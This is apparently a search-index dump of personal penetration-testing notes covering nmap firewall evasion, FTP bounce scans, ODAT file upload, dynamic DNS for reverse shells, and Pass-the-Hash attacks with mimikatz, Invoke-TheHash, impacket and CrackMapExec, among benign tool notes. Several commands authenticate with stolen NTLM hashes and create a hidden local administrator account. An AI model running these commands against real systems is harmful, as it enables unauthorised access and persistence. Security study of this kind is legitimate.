                        An adversary uses TCP ACK segments to gather information about firewall or ACL configuration. The purpose of this type of scan is to discover information about filter configurations rather than port state.

                        1. An adversary sends TCP packets with the ACK flag set and a sequence number of zero (which means that are not associated with an existing connection to target ports).

                        2. An adversary uses the response from the target to determine the port's state.

                          • Filtered port: The target ignores the packets, and dropped them. No response is returned or ICMP error codes.
                          • Unfiltered port: The target rejects the packets and returned an RST flag and different types of ICMP error codes (or none at all): Net Unreachable, Net Prohibited, Host Unreachable, Host Prohibited, Port Unreachable. If a RST packet is received the target port is either closed or the ACK was sent out-of-sync.

                        Unlike outgoing connections, all connection attempts (with the SYN flag) from external networks are usually blocked by firewalls. However, the packets with the ACK flag are often passed by the firewall because the firewall cannot determine whether the connection was first established from the external network or the internal network.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#detect-a-waf","title":"Detect a WAF","text":"
                        nmap -p 80 -script http-waf-detect $ip \n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#decoys","title":"Decoys","text":"

                        There are cases in which administrators block specific subnets from different regions in principle. Decoys can be used for SYN, ACK, ICMP scans, and OS detection scans.

                        With the Decoy scanning method (-D), Nmap generates various random IP addresses inserted into the IP header to disguise the origin of the packet sent.

                        sudo nmap $ip -p 80 -sS -Pn -n --disable-arp-ping --packet-trace -D RND:5\n# -D RND:5  Generates five random IP addresses that indicates the source IP the connection comes from.\n

                        Manually specify IP address (-S) for getting to services only accessible from individual subnets:

                        sudo nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0\n# -n: Disables DNS resolution.\n# -Pn: Disables ICMP Echo requests.\n# -p 445: Scans only the specified ports.\n# -O: Performs operation system detection scan.\n# -S: Scans the target by using different source IP address.\n# -e tun0: Sends all requests through the specified interface.\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#dns-proxying","title":"DNS proxying","text":"

                        The DNS queries are made over the UDP port 53. The TCP port 53 was previously only used for the so-called \"Zone transfers\" between the DNS servers or data transfer larger than 512 bytes. More and more, this is changing due to IPv6 and DNSSEC expansions. These changes cause many DNS requests to be made via TCP port 53.

                        Bypassing demilitarized zone (DMZ) by specifying DNS servers ourselves (we can use the company's DNS server). --dns-server <ns>,<ns>

                        We can also use TCP port 53 as a source port (--source-port) for our scans. If the administrator uses the firewall to control this port and does not filter IDS/IPS properly, our TCP packets will be trusted and passed through.

                        Example:

                        # Simple SYS-Scan of a filtered port\nsudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace\n# PORT      STATE    SERVICE\n# 50000/tcp filtered ibm-db2\n\n\n# SYN-Scan From DNS Port\nsudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53\n# PORT      STATE SERVICE\n# 50000/tcp open  ibm-db2\n

                        Following the example, a possible exploitation for this weak configuration would be:

                        nc -nv -p 53 $ip 50000\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#udp-scans-not-working-on-vpn-connections","title":"UDP scans not working on VPN connections","text":"

                        Explanation from https://www.reddit.com/r/nmap/comments/u08lud/havin_a_rough_go_of_trying_to_scan_a_subnet_with/:

                        As others have pointed out, scanning over a VPN link means you are limited to\u00a0internet-layer\u00a0interactions and operations. The \"V\" in VPN stands for Virtual, and means that you are not actually on the same link as the other hosts in your subnet, so you can't get information about their link-layer connections any more than they can know whether you've connected to the VPN via Starbucks WiFi, an Ethernet cable, or a dial-up modem.

                        You are further limited by the fact that Windows does not offer a general-purpose raw socket interface, so Nmap can't craft special packets at the network/internet layer. Usually we work around this by crafting Ethernet (link-layer) frames and injecting those with\u00a0Npcap, but VPN links do not use Ethernet frames, so that method doesn't work. We hope to be able to add this functionality in the future, but for now, VPNs are tricky to use with Npcap, and we haven't implemented PPTP or other VPN framing in Nmap to make it work. You can still do TCP Connect scanning (-sT), run most NSE scripts (-sC\u00a0or\u00a0--script), and do service version detection (-sV), but things like TCP SYN scan (-sS), UDP scanning (-sU), OS detection (-O), and traceroute (--traceroute) will not work.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#how-nmap-works","title":"How nmap works","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#ports","title":"Ports","text":"

                        Open port:

                        This indicates that the connection to the scanned port has been established. These connections can be TCP connections, UDP datagrams as well as SCTP associations.

                        Filtered port:

                        Nmap cannot correctly identify whether the scanned port is open or closed because either no response is returned from the target for the port or we get an error code from the target.

                        Close port:

                        When the port is shown as closed, the TCP protocol indicates that the packet we received back contains an RST flag. This scanning method can also be used to determine if our target is alive or not.

                        Unfiltered port:

                        This state of a port only occurs during the TCP-ACK scan and means that the port is accessible, but it cannot be determined whether it is open or closed.

                        **open|filtered ** port:

                        If we do not get a response for a specific port, Nmap will set it to that state. This indicates that a firewall or packet filter may protect the port.

                        closed|filtered port:

                        This state only occurs in the IP ID idle scans and indicates that it was impossible to determine if the scanned port is closed or filtered by a firewall.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#probes-for-host-discovery","title":"Probes for HOST discovery","text":"
                        TCP SYN probe (-PS <portlist>)\nTCP ACK probe (-PA <portlist>)\nUDP probe (-PU <portlist>)\nICMP Echo Request/Ping (-PE)\nICMP Timestamp Request (-PP)\nICMP Netmask Request (-PM)\n

                        List of the most filtered ports: 80, 25, 22, 443, 21, 113, 23, 53, 554, 3389, 1723. These are valuable ping ports.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#scans","title":"Scans","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-ss-or-tcp-syn-scan","title":"-sS (or TCP SYN scan)","text":"

                        By default, Nmap scans the top 1000 TCP ports with the SYN scan (-sS). This SYN scan is set only to default when we run it as root because of the socket permissions required to create raw TCP packets. Therefore, by default, Nmap performs a SYN Scan, though it substitutes a connect scan if the user does not have proper privileges to send raw packets (requires root access on Unix). Unprivileged users can only execute connect and FTP bounce scans.

                        • No connection established, but we got our response.
                        • Technique referred as half-open scanning, because you don't open a full TCP connection.
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-st-or-tcp-connect-scan","title":"-sT (or TCP Connect scan)","text":"

                        TCP connect scan is the default TCP scan type when SYN scan is not an option (when not running with privileges). The Nmap TCP Connect Scan (-sT) uses the TCP three-way handshake to determine if a specific port on a target host is open or closed. The scan sends an SYN packet to the target port and waits for a response. It is considered open if the target port responds with an SYN-ACK packet and closed if it responds with an RST packet.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-sn-a-null-scan","title":"-sN (A NULL scan)","text":"

                        In the SYN message that nmap sends, TCP flag header is set to 0.

                        If the response is:

                        • none: the port is open or filtered.
                        • RST: the port is closed.
                        • A response saying that it couldn't reach destiny, the port is filtered.
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-sa-ack-scan","title":"-sA (ACK scan)","text":"

                        Returns if the port is filtered or not. It's useful to detect a firewall. Filtered ports reveals the existence of some kind of firewall.

                        A variation of the TCP ACK scan is the TCP Windows scan.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-sw-tcp-windows-scan","title":"-sW (TCP Windows scan)","text":"

                        It also sends an ACK packet. In the response we pay attention to the Windows size of the TCP header_

                        • If the windows size is different from 0, the port is open.
                        • If the windows size is 0, the port is either close or filtered.
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#how-to-identify-operating-system-using-ttl-value-and-ping-command","title":"How To Identify Operating System Using TTL Value And Ping Command","text":"

                        After running:

                        sudo nmap $ip -sn -oA host -PE --packet-trace --disable-arp-ping \n

                        We can get:

                        Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 00:12 CEST\nSENT (0.0107s) ICMP [10.10.14.2 > 10.129.2.18 Echo request (type=8/code=0) id=13607 seq=0] IP [ttl=255 id=23541 iplen=28 ]\nRCVD (0.0152s) ICMP [10.129.2.18 > 10.10.14.2 Echo reply (type=0/code=0) id=13607 seq=0] IP [ttl=128 id=40622 iplen=28 ]\nNmap scan report for 10.129.2.18\nHost is up (0.086s latency).\nMAC Address: DE:AD:00:00:BE:EF\nNmap done: 1 IP address (1 host up) scanned in 0.11 seconds\n

                        You can quickly detect whether a system is running with Linux, or Windows or any other OS by looking at the TTL value from the output of the ping command. You don't need any extra applications to detect a remote system's OS. The default initial TTL value for Linux/Unix is 64, and TTL value for Windows is 128.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#saving-the-results","title":"Saving the results","text":"
                        -oN: Normal output with .nmap file extension\n-oG: Grepable output with the .gnmap file extension\n-oX: XML output  with the .xml file extension\n-oA: Save results in all formats\n

                        With the XML output, we can easily create HTML reports. To convert the stored results from XML format to HTML, we can use the tool xsltproc.

                        xsltproc target.xml -o target.html\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#quick-techniques","title":"Quick techniques","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#host-enumeration-determining-if-host-is-alive-with-arp-ping","title":"Host Enumeration: Determining if host is alive with ARP ping","text":"

                        It can be done with -packet-trace or with --reason.

                        sudo nmap <IP> -sn -oA host -PE --packet-trace\n# -sn   Disables port scanning.\n# -oA host  Stores the results in all formats starting with the name 'host'.\n# -PE   Performs the ping scan by using 'ICMP Echo requests' against the target.\n# --packet-trace    Shows all packets sent and received\n
                        sudo nmap <IP> -sn -oA host -PE --reason\n# -sn   Disables port scanning.\n# -oA host  Stores the results in all formats starting with the name 'host'.\n# -PE   Performs the ping scan by using 'ICMP Echo requests' against the target.\n# --reason  Displays the reason for specific result.\n

                        To disable ARP requests and scan our target with the desired ICMP echo requests, we can disable ARP pings by setting the \"--disable-arp-ping\" option.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#port-scanning-having-a-clear-view-of-a-syn-scan-on-a-port","title":"Port scanning: having a clear view of a SYN scan on a port","text":"

                        To have a clear view of the SYN scan on port 21, disable the ICMP echo requests (-Pn), DNS resolution (-n), and ARP ping scan (--disable-arp-ping).

                        sudo nmap <IP> -p 21 --packet-trace -Pn -n --disable-arp-ping\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#performing-a-ftp-bounce-attack","title":"Performing a FTP bounce attack","text":"

                        An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. For instance, consider we are targetting an FTP Server\u00a0FTP_DMZ\u00a0exposed to the internet. Another device within the same network,\u00a0Internal_DMZ, is not exposed to the internet. We can use the connection to the\u00a0FTP_DMZ\u00a0server to scan\u00a0Internal_DMZ\u00a0using the FTP Bounce attack and obtain information about the server's open ports.

                        nmap -Pn -v -n -p80 -b anonymous:password@$ipFTPdmz $ipINTERNALdmz\n# -b The\u00a0`Nmap`\u00a0-b flag can be used to perform an FTP bounce attack: \n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"noip/","title":"noip","text":"

                        When coding a reverse shell you don't need to hardcode the IP address of the attacker machine. Instead, you can use a Dynamic DNS server such as https://www.noip.com/. To inform this server of our attacker IP public address we will install a linux dynamic client on our kali (an agent that will do the trick).

                        ","tags":["pentesting","python"]},{"location":"noip/#install-dynamic-update-client-on-linux","title":"Install Dynamic Update Client on Linux","text":"

                        As root user:

                        cd /usr/local/src/\nwget http://www.noip.com/client/linux/noip-duc-linux.tar.gz\ntar xf noip-duc-linux.tar.gz\ncd noip-2.1.9-1/\nmake install\n
                        ","tags":["pentesting","python"]},{"location":"nslookup/","title":"nslookup","text":"

                        With Nslookup, we can search for domain name servers on the Internet and ask them for information about hosts and domains.

                        # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n

                        References: - nslookup (https://linux.die.net/man/1/nslookup)

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"nt-authority-system/","title":"NT Authority System","text":"

                        The LocalSystem account NT AUTHORITY\\SYSTEM is a built-in account in Windows operating systems, used by the service control manager. It has the highest level of access in the OS (and can be made even more powerful with Trusted Installer privileges). This account has more privileges than a local administrator account and is used to run most Windows services. It is also very common for third-party services to run in the context of this account by default. The SYSTEM account has thist privileges:

                        SE_ASSIGNPRIMARYTOKEN_NAME, SE_AUDIT_NAME, SE_BACKUP_NAME, SE_CHANGE_NOTIFY_NAME, SE_CREATE_GLOBAL_NAME, SE_CREATE_PAGEFILE_NAME, SE_CREATE_PERMANENT_NAME, SE_CREATE_TOKEN_NAME, SE_DEBUG_NAME, SE_IMPERSONATE_NAME, SE_INC_BASE_PRIORITY_NAME, SE_INCREASE_QUOTA_NAME, SE_LOAD_DRIVER_NAME, SE_LOCK_MEMORY_NAME, SE_MANAGE_VOLUME_NAME, SE_PROF_SINGLE_PROCESS_NAME, SE_RESTORE_NAME, SE_SECURITY_NAME, SE_SHUTDOWN_NAME, SE_SYSTEM_ENVIRONMENT_NAME, SE_SYSTEMTIME_NAME, SE_TAKE_OWNERSHIP_NAME, SE_TCB_NAME, SE_UNDOCK_NAME

                        The SYSTEM account on a domain-joined host can enumerate Active Directory by impersonating the computer account, which is essentially a special user account. If you land on a domain-joined host with SYSTEM privileges during an assessment and cannot find any useful credentials in memory or other data on the machine, there are still many things you can do. Having SYSTEM-level access within a domain environment is nearly equivalent to having a domain user account. The only real limitation is not being able to perform cross-trust Kerberos attacks such as Kerberoasting.

                        There are several ways to gain SYSTEM-level access on a host, including but not limited to:

                        • Remote Windows exploits such as EternalBlue or BlueKeep.
                        • Abusing a service running in the context of the SYSTEM account.
                        • Abusing SeImpersonate privileges using RottenPotatoNG against older Windows systems, Juicy Potato, or PrintSpoofer if targeting Windows 10/Windows Server 2019.
                        • Local privilege escalation flaws in Windows operating systems such as the Windows 10 Task Scheduler 0day.
                        • PsExec with the -s flag
                        ","tags":["active directory","ldap","windows"]},{"location":"objection/","title":"Objection","text":"

                        What it does? It makes a regular ADB connection ant start the frida server in the device. If you are using a rooted device it is needed to select the application that you want to test inside the --gadget option.

                        ","tags":["mobile pentesting"]},{"location":"objection/#installation","title":"Installation","text":"
                        pip3 install objection\n
                        ","tags":["mobile pentesting"]},{"location":"objection/#usage","title":"Usage","text":"

                        What it does? It makes a regular ADB connection ant start the frida server in the device. If you are using a rooted device it is needed to select the application that you want to test inside the --gadget option.

                        In the metromadrid app, this would be:

                        objection --gedget es.metromadrid.metroandroid explore\n
                        ","tags":["mobile pentesting"]},{"location":"objection/#basic-commands","title":"Basic commands","text":"
                        # Some interesting information (like passwords, paths...) could be found inside the environment.\nenv\n\nfile download <remotepath> [<localpath>]\nfile upload <localpath> [<remotepath>]\nimport <localpath frida-script>\n\n# Disable SSL pinning on android devices\nandroid sslpinningdisable\n
                        ","tags":["mobile pentesting"]},{"location":"oci-fundamentals-preparation/","title":"Notes","text":"

                        Oci has more than 80 services.

                        Instead of regions and availability zones, in Oracle we have Regions and Availability Domains. Instead of datacenters as next level, we have fault domains.

                        Instead of datacenters as next level, we have fault domains.

                        "},{"location":"odat/","title":"odat - Oracle Database Attacking Tool","text":"

                        Oracle Database Attacking Tool (ODAT) is an open-source penetration testing tool written in Python and designed to enumerate and exploit vulnerabilities in Oracle databases. It can be used to identify and exploit various security flaws in Oracle databases, including SQL injection, remote code execution, and privilege escalation.

                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"odat/#installation","title":"Installation","text":"

                        This script installs the needed packages and tools:

                        #!/bin/bash\n\nsudo apt-get install libaio1 python3-dev alien python3-pip -y\ngit clone https://github.com/quentinhardy/odat.git\ncd odat/\ngit submodule init\nsudo submodule update\nsudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y\npip3 install cx_Oracle\nsudo apt-get install python3-scapy -y\nsudo pip3 install colorlog termcolor pycryptodome passlib python-libnmap\nsudo pip3 install argcomplete && sudo activate-global-python-argcomplete\n

                        Check installation with:

                        ./odat.py -h\n
                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"odat/#basic-usage","title":"Basic usage","text":"

                        We can use the odat.py from ODAT tool to retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations,...

                        /odat.py all -s $ip\n

                        Upload a web shell to the target:

                        # Upload a web shell to the target. This requires the server to run a web server, and we need to know the exact location of the root directory for the webserver.\n\n## 1. Creating a non suspicious web shell \necho \"Oracle File Upload Test\" > testing.txt\n\n## 2. Uploading the shell to linux (/var/www/html) or windows (C:\\\\inetpub\\\\wwwroot):\n./odat.py utlfile -s $ip -d XE -U <user> -P <password> --sysdba --putFile C:\\\\inetpub\\\\wwwroot testing.txt ./testing.txt\n\n## 3. Test if the file upload approach worked with curl, or visit via browser.\ncurl -X GET http://$ip/testing.txt\n
                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"odata-pentesting/","title":"Pentesting oData","text":"

                        The Open Data Protocol (OData) is an open web protocol for querying and updating data. OData enables the creation of HTTP-based RESTful2 data services that can be used to publish and edit resources that are identified using uniform resource identifiers (URIs) with simple HTTP messages.

                        ","tags":["oData","pentesting","webpentesting","Dynamics"]},{"location":"odata-pentesting/#the-service-metadata-document","title":"The Service Metadata Document","text":"

                        It usually has this syntax:

                        http://localhost:32026/OData/OData.svc/$metadata\n

                        https://infosecwriteups.com/unauthorized-access-to-odata-entities-2k-bounty-from-microsoft-e070b2ef88c2

                        The\u00a0**OData metadata**\u00a0is a data model of the system(consider it as\u00a0**information_schema**\u00a0in relational databases). For each metadata, we have\u00a0**entities**(similar to\u00a0**tables**\u00a0in relational databases) and\u00a0**properties**\u00a0(similar to\u00a0**columns**) as well as the relationship between different entity types. Each entity type has an\u00a0**entity key**\u00a0that is similar to the key in relational databases.\n
                        ","tags":["oData","pentesting","webpentesting","Dynamics"]},{"location":"onesixtyone/","title":"onesixtyone - Fast and simple SNMP scanner","text":"

                        See SNMP for details about the protocol.

                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"onesixtyone/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/trailofbits/onesixtyone.

                        sudo apt install onesixtyone\n
                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"onesixtyone/#basic-usage","title":"Basic usage","text":"
                        onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt $ip\n
                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"openssl/","title":"openSSL - Cryptography and SSL/TLS Toolkit","text":"

                        openSSL Website.

                        ","tags":["openssl"]},{"location":"openssl/#basic-usage","title":"Basic usage","text":"
                        openssl s_client -connect target.site:443\nHEAD / HTTP/1.0\n
                        • Create self signed certificates.
                        • Encrypt/Decrypt files
                        • Generate private/public keys.
                        • Encrypt/Decrypt files with public/private keys.
                        # Pwnbox - Create a Self-Signed Certificate\nopenssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'\n\n# Encrypt a file\nopenssl enc -aes-256-cbc -iter 100000 -pbkdf2 -in sourceFile.txt -out outputFile.txt.enc\n# -iter 100000: Optional. Override the default iterations counts with this option.\n# -pbkdf2: Optional. Use the Password-Based Key Derivation Function 2 algorithm.\n\n# Decrypt a file\nopenssl enc -d -aes-256-cbc -iter 100000 -pbkdf2 -in encryptedFile.enc -out outputFile.txt\n\n# Generate private key\nopenssl genrsa -aes256 -out private.pem 2048\n\n# Generate public key\nopenssl rsa -in private.pem -outform PEM -pubout -out public.pem\n\n# Encrypt a file with public key\nopenssl rsautl -encrypt -inkey public.pem -pubin -in file.txt -out file.enc\n# -pubin: Specify the entry parameter\n\n# Decrypt a dile with private key\nopenssl rsautl -decrypt -inkey private.pem -in file.enc -out file.txt\n
                        ","tags":["openssl"]},{"location":"openvas/","title":"OpenVAS","text":"

                        OpenVAS by Greenbone Networks is a publicly available open-source vulnerability scanner. OpenVAS can perform network scans, including authenticated and unauthenticated testing.

                        Scans may take 1-2 hours to finish.

                        ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvas/#installation","title":"Installation","text":"
                        # Updating packages\nsudo apt-get update && apt-get -y full-upgrade\n\n# Install the tool\nsudo apt-get install gvm && openvas\n\n# Initiate setup process\nsudo gvm-setup\n\n\n# Check installation\nsudo gvm-check-setup\n\n\n\n# Start OpenVAS\nsudo gvm-start\n

                        Openvas stands for Open Vulnerability Assessment Scanner. It's based on assets (not on scans). These assets may be hosts, operating systems, TLS certificates... Scans are called here Tasks.

                        ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvas/#basic-usage","title":"Basic usage","text":"
                        # Start OpenVAS\nsudo gvm-start\n

                        Go to https://$ip:8080

                        Documentation.

                        • Base: This scan configuration is meant to enumerate information about the host's status and operating system information.
                        • Discovery: Enumerate host's services, hardware, accessible ports, and software being used on the system.
                        • Host Discovery: Whether the host is alive and determines what devices are active on the network. OpenVAS leverages ping to identify if the host is alive.
                        • System Discovery: Enumerates the target host further than the 'Discovery Scan' and attempts to identify the operating system and hardware associated with the host.
                        • Full and fast: This configuration is recommended by OpenVAS as the safest option and leverages intelligence to use the best NVT checks for the host(s) based on the accessible ports.

                        There are various export formats for reporting purposes, including XML, CSV, PDF, ITG, and TXT. If you choose to export your report out as an XML, you can leverage various XML parsers to view the data in an easier to read format.

                        ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvas/#reporting","title":"Reporting","text":"

                        See openVAS Reporting.

                        ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvasreporting/","title":"openVAS Reporting","text":"","tags":["reconnaissance","scanner","vulnerability assessment","reporting"]},{"location":"openvasreporting/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/TheGroundZero/openvasreporting.

                        # Install Python3 and pip3 before.\n\n# Clone git repository\ngit clone https://github.com/TheGroundZero/openvasreporting.git\n\n# Install required python packages\ncd openvasreporting\npip3 install pip --upgrade\npip3 install build --upgrade\npython -m build\n\n# Install module\npip3 install dist/OpenVAS_Reporting-X.x.x-py3-xxxx-xxx.whl\n

                        Alternative with pip3

                        # Install Python3 and pip3\napt(-get) install python3 python3-pip # Debian\n\n# Install the package\npip3 install OpenVAS-Reporting\n
                        ","tags":["reconnaissance","scanner","vulnerability assessment","reporting"]},{"location":"openvasreporting/#basic-usage","title":"Basic usage","text":"
                        python3 -m openvasreporting -i report-2bf466b5-627d-4659-bea6-1758b43235b1.xml -f xlsx\n
                        ","tags":["reconnaissance","scanner","vulnerability assessment","reporting"]},{"location":"operating-systems/","title":"Repo for legacy Operating system","text":"","tags":["resources"]},{"location":"operating-systems/#old-version-of-windows","title":"Old version of Windows","text":"

                        From Windows 1.0 DR 5 to nowadays ISOs: https://osvault.weebly.com/windows-beta-repository.html

                        ","tags":["resources"]},{"location":"operating-systems/#windows-servers","title":"Windows servers","text":"","tags":["resources"]},{"location":"operating-systems/#-windows-server-2019-httpswwwmicrosoftcomes-esevalcenterdownload-windows-server-2019","title":"- Windows Server 2019: https://www.microsoft.com/es-es/evalcenter/download-windows-server-2019.","text":"","tags":["resources"]},{"location":"ophcrack/","title":"ophcrack - A windows password cracker based on rainbow tables","text":"

                        Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

                        ","tags":["pentesting","password cracker"]},{"location":"ophcrack/#installation","title":"Installation","text":"

                        Download from https://ophcrack.sourceforge.io/.

                        ","tags":["pentesting","password cracker"]},{"location":"owasp-zap/","title":"OWASP zap","text":"

                        To launch it, run:

                        zaproxy\n

                        You can do several things:

                        • Run an automatic attack.
                        • Import your spec.yml file and run an automatic attack.
                        • Run a manual attack.

                        The manual explore option will allow you to perform authenticated scanning. Set the URL to your target, make sure the HUD is enabled, and choose \"Launch Browser\".

                        "},{"location":"owasp-zap/#how-to-run-a-manual-attack","title":"How to run a manual attack","text":"

                        Select \"Continue to your target\". On the right-hand side of the HUD, you can set the Attack Mode to On. This will begin scanning and performing authenticated testing of the target. Now you perform all the actions (sign up a new user, log in into the account, modify you avatar, post a comment...).

                        After that, OWASP Zap allows you to narrow the results to your target. How? In the Sites module, right click on your site and select \"Include in context\". After that, click on the icon shaped as a \"target\" to filter out sites by context.

                        With the results, start your analysis and remove false-negative vulnerabilities.

                        "},{"location":"owasp-zap/#interesting-addons","title":"Interesting addons","text":"

                        Update all your addons when opening ZAP for the first time.

                        • Treetools
                        • Reflect
                        • Revisit
                        • Directory List v.2.3
                        • Wappalyzer
                        • Python Scripting
                        • Passive scanner rules
                        • FileUpload
                        • Regular Expression tester.
                        "},{"location":"p0f/","title":"P0f","text":"

                        P0f is a tool that utilizes an array of sophisticated, purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications (often as little as a single normal SYN) without interfering in any way. Version 3 is a complete rewrite of the original codebase, incorporating a significant number of improvements to network-level fingerprinting, and introducing the ability to reason about application-level payloads (e.g., HTTP).

                        ","tags":["scanning","tcp","reconnaissance","passive reconnaissance"]},{"location":"p0f/#installation","title":"Installation","text":"

                        Download from: https://lcamtuf.coredump.cx/p0f3/.

                        ","tags":["scanning","tcp","reconnaissance","passive reconnaissance"]},{"location":"p0f/#_1","title":"p0f","text":"","tags":["scanning","tcp","reconnaissance","passive reconnaissance"]},{"location":"pass-the-hash/","title":"Pass The Hash","text":"

                        With NTLM, passwords stored on the server and domain controller are not \"salted,\" which means that an adversary with a password hash can authenticate a session without knowing the original password. A Pass the Hash (PtH) attack is a technique where an attacker uses a password hash instead of the plain text password for authentication.

                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-mimikatz-windows","title":"Pass the Hash with Mimikatz (Windows)","text":"

                        see mimikatz

                        # Pass The Hash attack in windows:\n# 1. Run mimikatz\nmimikatz.exe privilege::debug \"sekurlsa::pth /user:<username> /rc4:<NTLM hash> /domain:<DOMAIN> /run:<Command>\" exit\n# sekurlsa::pth is a module that allows us to perform a Pass the Hash attack by starting a process using the hash of the user's password\n# /run:<Command>: For example /run:cmd.exe\n# 2. After that, we canuse cmd.exe to execute commands in the user's context. \n
                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-powershell-invoke-thehash-windows","title":"Pass the Hash with PowerShell Invoke-TheHash (Windows)","text":"

                        See Powershell Invoke-TheHash. This tool is a collection of PowerShell functions for performing Pass the Hash attacks with WMI and SMB. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.

                        When using Invoke-TheHash, we have two options: SMB or WMI command execution.

                        cd C:\\tools\\Invoke-TheHash\\\n\nImport-Module .\\Invoke-TheHash.psd1\n
                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#invoke-thehash-with-smb","title":"Invoke-TheHash with SMB","text":"
                        Invoke-SMBExec -Target $ip -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command \"net user mark Password123 /add && net localgroup administrators mark /add\" -Verbose\n# Command to execute on the target. If a command is not specified, the function will check to see if the username and hash have access to WMI on the target.\n# we can execute `Invoke-TheHash` to execute our PowerShell reverse shell script in the target computer.\n

                        How to generate a reverse shell.

                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#invoke-thehash-with-wmi","title":"Invoke-TheHash with WMI","text":"
                        Invoke-WMIExec -Target $machineName -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command  \"net user mark Password123 /add && net localgroup administrators mark /add\" \n

                        How to generate a reverse shell.

                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-linux","title":"Pass the Hash with Impacket (Linux)","text":"","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-psexec","title":"Pass the Hash with Impacket PsExec","text":"
                        impacket-psexec <username>@$ip -hashes :30B3783CE2ABF1AF70F77D0660CF3453\n
                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-wmiexec","title":"Pass the Hash with impacket-wmiexec","text":"

                        Download from: https://github.com/fortra/impacket/blob/master/examples/wmiexec.py.

                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-atexec","title":"Pass the Hash with impacket-atexec","text":"

                        Download from: https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py

                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-smbexec","title":"Pass the Hash with impacket-smbexec","text":"

                        Download from: https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py

                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-crackmapexec-linux","title":"Pass the Hash with CrackMapExec (Linux)","text":"

                        See CrackMapExec

                        # Using a hash instead of a password, to authenticate ourselves\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>\n\n# Execute commands with flag -x\ncrackmapexec smb $ip/24 -u <Administrator> -d . -H <hash> -x whoami\n
